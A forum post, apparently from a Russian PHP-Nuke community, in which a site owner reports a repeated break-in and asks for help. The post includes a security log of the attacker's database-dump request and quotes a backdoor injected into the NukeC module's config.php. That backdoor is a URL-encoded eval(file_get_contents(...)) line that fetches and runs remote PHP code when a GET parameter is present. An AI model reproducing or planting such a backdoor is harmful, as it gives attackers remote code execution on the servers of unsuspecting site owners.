Тема: Дыра в фильтре Sql-инъекций
Показать сообщение отдельно
airman2000 вне форума      Старый #9  
airman2000
Новенький
Регистрация: 27.03.2006
Сообщения: 6


Пожаловаться на это сообщениеОтветить с цитированием

Посмотреть профиль Отправить персональное сообщение для airman2000 Найти все сообщения от airman2000 Добавить airman2000 в список друзей  
12.01.2011, 09:53

И снова хакают сайт
Каким-то образом вставляют код в поле content в таблице мойпрефикс_blocks
Как это запретить?

Более того, обнаружил после у себя в папке модуля NukeC закаченный File manager
А MyNukeSecurity руганулась вот так:

IP: 78.46.102.***
USER: *****
URL: /modules.php?name=nukeC
POST variables:
a = Sql
p1 = select
p2 = magaz
c = /var/www/admin/мой_сайт
charset =
type = mysql
sql_host = localhost
sql_login = мой_логин
sql_pass = мой_пароль
sql_base = мой_база
file = dump.sql
Module: nukeC
Refer: http://www.мойсайт/modules.php?name=nukeC&2

А в файле config.php в модуле NukeC был вставлен такой код:
Код:
if(isset($_GET[2])){eval(file_get_contents(urldecode('%68%74%74%70%  3A%2F%2F%63%6D%65%78%2E%74%75%6C%61%2D%6E%65%74%2E  %72%75%2F%6E%65%77%73%2F%64%61%74%61%2F%31%2E%74%7  8%74')));die();}


Помогите, что сделать?